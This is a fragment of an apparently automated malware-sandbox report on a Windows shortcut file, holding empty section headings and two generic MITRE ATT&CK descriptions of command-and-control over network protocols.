\Device\ConDrv

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Network Port Distribution

Windows Analysis Report
knfV5IVjEV.lnk

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre